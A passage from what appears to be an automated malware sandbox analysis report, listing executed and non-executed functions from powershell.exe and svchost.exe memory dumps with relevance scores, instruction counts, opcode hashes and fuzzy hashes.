Instruction ID: b89eb315be7ba1f041818ad8131e7e8e5c8d0eab0dec96fa46048280296525b1
Opcode Fuzzy Hash: ec2c3239382e2850254ec55decac601eff91133d498350d34ea9d23da68f92b0
Instruction Fuzzy Hash: 1E21F522B0DA968FE7E9DB1C44B053466C2EF66214B4801BED24DC71ABEE1CEC049351

Function 00007FFD349843BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8c3eb1df06564715292e6147ff91ad93fe030e53a0fa2487b068efb51f85af
Instruction ID: e9fd6c30522f0f8a8c868a220e1735bb454c27e57c9d9de79f2589ad85decfa7
Opcode Fuzzy Hash: 0a8c3eb1df06564715292e6147ff91ad93fe030e53a0fa2487b068efb51f85af
Instruction Fuzzy Hash: 7611CE32A0E5858FE6E4DB2C84B45B8BAD1EF02224B4800FED55DC749AEA1DAC049361

Function 00007FFD3498681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082fed0b9b0e4a3c91b5d176175d98198bd1a46dbc2e9233d62590321113395c
Instruction ID: 7b856670e83582b4b55e90548cfd6971a1b1b29ad17c107cd1f3225bce55f71d
Opcode Fuzzy Hash: 082fed0b9b0e4a3c91b5d176175d98198bd1a46dbc2e9233d62590321113395c
Instruction Fuzzy Hash: A8110632B0D68C4FEB95EA9C44E41A87BD1EF5A310F0840BEC54CDB097CD29AC45C360

Function 00007FFD348B33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41

Function 00007FFD348BA0FB Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f283b9c74f66acfe5e497620f240b960123af2655562c0fd05f9d1d5288a9786
Instruction ID: cb478ab6da068a6dc9c59634fd8c5c0a4cb71a2bcb4513b74835ffdf46093b02
Opcode Fuzzy Hash: f283b9c74f66acfe5e497620f240b960123af2655562c0fd05f9d1d5288a9786
Instruction Fuzzy Hash: 2DF0FC76A0D9894FDB81EF1CA8A50E97FA0FF66201B0501B7D649C7162DE6798088BC1

Non-executed Functions

Function 00007FFD348B8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

L_^J, xrefs: 00007FFD348B8C62
L_^N, xrefs: 00007FFD348B8C72
L_^K, xrefs: 00007FFD348B8C6A
L_^<, xrefs: 00007FFD348B8C12
L_^8, xrefs: 00007FFD348B8BF2
L_^Q, xrefs: 00007FFD348B8C8A
L_^Y, xrefs: 00007FFD348B8CBA
L_^?, xrefs: 00007FFD348B8C2A

Memory Dump Source

Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
API String ID: 0-1415242001
Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
Instruction ID: f1a64f0b6e82653b6e2f797f0d6a21b5c083699dbe79f4594f21844774ac4221
Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
Instruction Fuzzy Hash: 7C21C2B3B045155AC21236FDB8625EE6794DB9437834962F3E218DF513EF78B48B8A80

Analysis Process: powershell.exePID: 4044, Parent PID: 6216COMMON

Executed Functions

Function 00007FFD34899E7D Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9ba965dfc689ae03982f41661b89ded3b204ff0ea381abbcbddc1f3f82be5d
Instruction ID: 45c0ef8ee52f83b97d6fab133f583fb117c8d54054d6e8a1fd0b2789872ac0e2
Opcode Fuzzy Hash: 9e9ba965dfc689ae03982f41661b89ded3b204ff0ea381abbcbddc1f3f82be5d
Instruction Fuzzy Hash: 5091FB27A0DE965BE711A76C9CB60DE7F90DF5336470800B6CA94CB193ED1C24179792

Function 00007FFD348996FA Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab88495e8f8218fa2d9d132f388da7de84c8b6ba726976b09bd4116b85cf934
Instruction ID: 083804bef055031796684341da24fa9e452d26ac301670ec7eeb8f233187476c
Opcode Fuzzy Hash: bab88495e8f8218fa2d9d132f388da7de84c8b6ba726976b09bd4116b85cf934
Instruction Fuzzy Hash: C3511971A0DB895FDB099F5858655A87FE0FB96311F04417FD088C7292DF28B806CBC2

Function 00007FFD3477E620 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2466062534.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd3477d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506ed150b3195e51ced3e568285404ed1fcfa7d5c6b9e83e5d8057929eb05c62
Instruction ID: 22c124d04542aad7305cba365b533dd1410234d04cfd8fededf2d9695afc5aeb
Opcode Fuzzy Hash: 506ed150b3195e51ced3e568285404ed1fcfa7d5c6b9e83e5d8057929eb05c62
Instruction Fuzzy Hash: 3041247140DBC48FE7569B399C959623FF0EF53320B1905DFE088CB1A3D629A846C7A2

Function 00007FFD3489A47C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee1c0cfdeb865a836a5d701defdc501550d12bf955d712256939d0cf8ba399b
Instruction ID: 7ff77be39b3fca0de6baf761e02ac3828e52b27d262899f8bdad8020c19007b0
Opcode Fuzzy Hash: 5ee1c0cfdeb865a836a5d701defdc501550d12bf955d712256939d0cf8ba399b
Instruction Fuzzy Hash: 29213A3090CB4C4FEB59DFAC988A7E97FF0EB96320F04416BD448C3152DA74A41ACB91

Function 00007FFD3496681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2468007323.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db5cfb75cc300143901e218553e05cefd29ddd4f1becc73773202125aae3f72
Instruction ID: 4142992b9a7abf350f55ddb053b6a08169c48cbfd0aa72e89a6efd89a620e93c
Opcode Fuzzy Hash: 3db5cfb75cc300143901e218553e05cefd29ddd4f1becc73773202125aae3f72
Instruction Fuzzy Hash: 19110672B0D6884FEB55EAA844E41A87BD1EF56334B0840BEC54CD7097CD2DAC45C360

Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41

Function 00007FFD3496414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2468007323.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
Instruction ID: 5028e53ca6dd74868b050c99109024b836a151387cf3de5a3da73d6fb943ed66
Opcode Fuzzy Hash: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
Instruction Fuzzy Hash: A6F0B432B0D5048FD768EB8CE4908E473E1EF6633071500BAE15DC71A7DA2AEC44CB55

Function 00007FFD34964400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2468007323.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
Instruction ID: 9ed738f39e9f4c5d3a410aba5bc86c18278066742fba7ba725c20fd9d74509f2
Opcode Fuzzy Hash: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
Instruction Fuzzy Hash: 69F0BE32A0D5448FDB55EB8CE0914E873E0FF0633474500BAE65DC70A3DA2AAC44CB50

Function 00007FFD349641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2468007323.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 58f1382bb6993b943f8ab3d8c690b4bd7c13bec444ad5981856bae3d5ed08961
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: A8E01A31B0C818CFDA68DA4CE090DE973E1EBA933171201BBD24EC7565CA2AEC519B94

Function 00007FFD348978CD Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe151aa1d98b30eb3e44e257ca4ec546ee61a02c33a5d648e6dce01c480f3e9
Instruction ID: 036ad3474b1436a10f9267f4ff681f084d6d932386563028ddf09ee700560bfa
Opcode Fuzzy Hash: 1fe151aa1d98b30eb3e44e257ca4ec546ee61a02c33a5d648e6dce01c480f3e9
Instruction Fuzzy Hash: 42E0C22034CA868FD355926CA0A07B9BB81AF86310F54187EF5CEC33C7CA8DA8816352

Non-executed Functions

Function 00007FFD34898995 Relevance: 5.1, Strings: 4, Instructions: 141COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD34898A6A
N_^, xrefs: 00007FFD34898AC2
N_^, xrefs: 00007FFD348989C9
N_^, xrefs: 00007FFD34898A2A

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 077faf8d8f587a84edeea93aab7f576fc6360405efa888b64ce7b3bc4a8b87c6
Instruction ID: 8b5faa5363222716bc36969bc04b66bfba54b7b20ff57dbe1fe4ba7f088dec66
Opcode Fuzzy Hash: 077faf8d8f587a84edeea93aab7f576fc6360405efa888b64ce7b3bc4a8b87c6
Instruction Fuzzy Hash: BE416FA3A1EAC35FE35747685CB51997FE0EF13364B0905F6C285CB093ED1D184A9293

Function 00007FFD34898BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^7, xrefs: 00007FFD34898C12
N_^J, xrefs: 00007FFD34898C8A
N_^4, xrefs: 00007FFD34898BFA
N_^F, xrefs: 00007FFD34898C7A

Memory Dump Source

Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: 3b76da1c841fbdb11da6a3614379ab6690a2d8885d252c0cc13f4bf58231014a
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: D32101B7B084266FD3127BFCAD346DA3B54DB9433474902B2D298DB143E934708A8AC2

Analysis Process: powershell.exePID: 1088, Parent PID: 6216COMMON

Executed Functions

Function 00007FFD348A644D Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2627934258.00007FFD348A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd348a5000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b172d65c5c4ef5e0398998db293c94c61592f34ecf0aaa30848f2fa812a4c1b
Instruction ID: 2f241febc7cc4dd00245fb41c489c950201954a9d6df5f96d3994fdc3c89313d
Opcode Fuzzy Hash: 5b172d65c5c4ef5e0398998db293c94c61592f34ecf0aaa30848f2fa812a4c1b
Instruction Fuzzy Hash: 6ED1A130A18A4D8FDF94DF58C4A5AE97BE1FF69300F14416AD44DD72AACB78E841CB81

Function 00007FFD348A9573 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2627934258.00007FFD348A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd348a5000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace24b4079d7b72094c3ecb0c31ab2c5b626e0ef060125b19fa86f049dd8714e
Instruction ID: c704479e84ae4a31b617fa7a8261bf11cbd710b4db1ea00f2ccfe656ea4201d2
Opcode Fuzzy Hash: ace24b4079d7b72094c3ecb0c31ab2c5b626e0ef060125b19fa86f049dd8714e
Instruction Fuzzy Hash: 46B12962A0F7C50FE756DB6C58751A57FA0EF53214B0C01BBC098CB1D3DE69A806CBA2

Function 00007FFD34974073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2629125262.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da57fc1a3e057b147478428829fbc7de8293e6b0a349e378473c6faf6eabbb19
Instruction ID: 027c6e444f540c8df9010062d41e64e0b6fef18805f88d8fc73e607aa11bc9d5
Opcode Fuzzy Hash: da57fc1a3e057b147478428829fbc7de8293e6b0a349e378473c6faf6eabbb19
Instruction Fuzzy Hash: 2F514D32B0DA568FE799E61C48B15747BD2EFA6260B1840BFC18DC7197DE28EC058351

Function 00007FFD34974370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2629125262.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5434c86879f248aed41e87e8a1918296e0d23619bbfcb6e30031d1b9e369796
Instruction ID: 084a7e3a57c2de217ef6e9a7267576631526194fb401cad3884f7efe54ca2b6a
Opcode Fuzzy Hash: f5434c86879f248aed41e87e8a1918296e0d23619bbfcb6e30031d1b9e369796
Instruction Fuzzy Hash: C5415B32B4DA498FEBA5D76C58A05B47BD1EF86324B4840BFD18DC7197EA18FC019351

Function 00007FFD348AA73C Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2627934258.00007FFD348A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd348a5000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72879fdb4dd0638efaa0621e56e6d91d8bf56e69c28e5207c275a5a775f38c4
Instruction ID: 2f7f2eae7bc52b4f703b16ef02fcd31d7ced7e3d1f25a36396753e1320286790
Opcode Fuzzy Hash: e72879fdb4dd0638efaa0621e56e6d91d8bf56e69c28e5207c275a5a775f38c4
Instruction Fuzzy Hash: 16314A31A0DB8C4FEB54DBA8985A6FA7BE0EF56320F04417FD049C7153DA685846C791

Function 00007FFD3478ED40 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2626771247.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd3478d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4ce6c49c1ec729a027a0ec53f26357e1417313136dea71bdf578462385f0c6
Instruction ID: 0d0f9fb1be8335678a879cbeba370c3634369e60c7fd6454e1b92050011a8d2f
Opcode Fuzzy Hash: bc4ce6c49c1ec729a027a0ec53f26357e1417313136dea71bdf578462385f0c6
Instruction Fuzzy Hash: BE41F87141DBC48FD7969B2898929523FF0EF57321B1905DFD088CB1A3D629B84AC7A3

Function 00007FFD349740BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2629125262.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a5d2ec36b4b4477a6057d182ff5a85e2c77e356cf169e6317730772c6ff306
Instruction ID: cb3f790e7b873c564e5fb2b89b3b291baac56776828b0fb3191cfa11120f70e7
Opcode Fuzzy Hash: f4a5d2ec36b4b4477a6057d182ff5a85e2c77e356cf169e6317730772c6ff306
Instruction Fuzzy Hash: 21212B33B0DA968FE7A5EA1C48F05746AC2EF66250B5940BED58DC71EBCD2CEC049311

Function 00007FFD349743BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2629125262.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1897709d59b10808e8dc68a1a913b7394d8915eace923ad557f171a180f42898
Instruction ID: a86fbe7f3293dbff476d2ddd6e2b498e860af7156f0c7f6001f613026cd9629c
Opcode Fuzzy Hash: 1897709d59b10808e8dc68a1a913b7394d8915eace923ad557f171a180f42898
Instruction Fuzzy Hash: 4C110632B4E5458FE7A4D61848F45B47BD1EF4222475940FED19DC709BDA2DAC009760

Function 00007FFD3497681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2629125262.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a64817820dad4108c0c2ad76de472f6c875d35bf55feb4d078e75b76e2a7d7ee
Instruction ID: 1e6a667867ba038bc4d4b9665912347d75085c4fe2635d8cd83bd964cfc2246c
Opcode Fuzzy Hash: a64817820dad4108c0c2ad76de472f6c875d35bf55feb4d078e75b76e2a7d7ee
Instruction Fuzzy Hash: C6110672B0D6884FEB65EA9848E45E87FD1EF56320B0880BEC54CCB197CD2DAC45C320

Function 00007FFD348A33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2627934258.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45

Non-executed Functions

Function 00007FFD348A8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^?, xrefs: 00007FFD348A8C2A
M_^<, xrefs: 00007FFD348A8C12
M_^8, xrefs: 00007FFD348A8BF2
M_^J, xrefs: 00007FFD348A8C62
M_^Y, xrefs: 00007FFD348A8CBA
M_^K, xrefs: 00007FFD348A8C6A
M_^N, xrefs: 00007FFD348A8C72
M_^Q, xrefs: 00007FFD348A8C8A

Memory Dump Source

Source File: 0000000B.00000002.2627934258.00007FFD348A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd348a5000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
Instruction ID: 0d89409c9456d6fc60ab0403801a8cf6c960bb07274d0b8a9fee97d209a9d1ca
Opcode Fuzzy Hash: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
Instruction Fuzzy Hash: 5921F273B045259AC21236FCB8619D97794DF5437838A03F3E028DF193F978B48B8A80

Analysis Process: svchost.exePID: 2716, Parent PID: 1064COMMON

Executed Functions

Function 00007FFD348916D9 Relevance: .9, Instructions: 868COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2706314623.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51746fd92dcb0bfa7f2d48035993d62b6e2d36116c36889ddedaceaf8b0bf619
Instruction ID: 2c351c6a2ca3d06497a7364a25361a6232e4e13dcf4665673e61a9ac411deea1
Opcode Fuzzy Hash: 51746fd92dcb0bfa7f2d48035993d62b6e2d36116c36889ddedaceaf8b0bf619
Instruction Fuzzy Hash: B6429021B1CA094FE7A8EB6884B56BDBAD6FF99310F540579E44EC32D2DE38B8419341

Function 00007FFD34892145 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2706314623.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32725d1f5ced5b87c39e53fa624395cf192bbdc4ad835a40010ef7cef4ec22c1
Instruction ID: bf0ef0aacf3998df1bee92a8031bda1751efd983bc533c108c831ebf92c87138
Opcode Fuzzy Hash: 32725d1f5ced5b87c39e53fa624395cf192bbdc4ad835a40010ef7cef4ec22c1
Instruction Fuzzy Hash: 7751E010B1EAC54FE796A7B858742B67FD5DF87219B0808FBE089C71A3DD18584AC342

Function 00007FFD348912BD Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

1O_^, xrefs: 00007FFD34891301

Memory Dump Source

Source File: 0000000F.00000002.2706314623.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_svchost.jbxd

Similarity

API ID:
String ID: 1O_^
API String ID: 0-2749740877
Opcode ID: 9c4bfb9eb74438e0b6e14a47e4e0229deb3cd9690a25c7eaedf65526f7d29477
Instruction ID: d75b2b38d080e970fcd3460fc89d9391b914ba5d3b3a87c0d0bc9a34d996810a
Opcode Fuzzy Hash: 9c4bfb9eb74438e0b6e14a47e4e0229deb3cd9690a25c7eaedf65526f7d29477
Instruction Fuzzy Hash: 3F31B336E0DB924FE756ABBC98B60D97FB0EF43314B0901B7C188CB193E92C68069751

Function 00007FFD34890E4E Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2706314623.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c40f5713cf9c415c254a405e06ca9a678b3946710b2a541a705c1349273a82
Instruction ID: bb71a0f4328fb372a8cd943bfb5a3ebe7c53e791219e10a542e3443777ba0dcc
Opcode Fuzzy Hash: 15c40f5713cf9c415c254a405e06ca9a678b3946710b2a541a705c1349273a82
Instruction Fuzzy Hash: 4C51E521B0DA860FE366A7BC58652B93FD5DF8732170940FBD489C7193DD1C6C468352

Function 00007FFD34890B5F Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2706314623.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b520abeac61d2b6aa24ba9b33fe2deec7186bec9ee855598c71f2419a4e852fe
Instruction ID: f6f68d90acf9ee01af71749ae298479d831286078c8666945d9046c2156ea9d3
Opcode Fuzzy Hash: b520abeac61d2b6aa24ba9b33fe2deec7186bec9ee855598c71f2419a4e852fe
Instruction Fuzzy Hash: A441D236B08A1E9FDB44EBA8D8B16ED77E5FF85315B54013AD109D7282CE38B846C780

Function 00007FFD348907A5 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2706314623.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
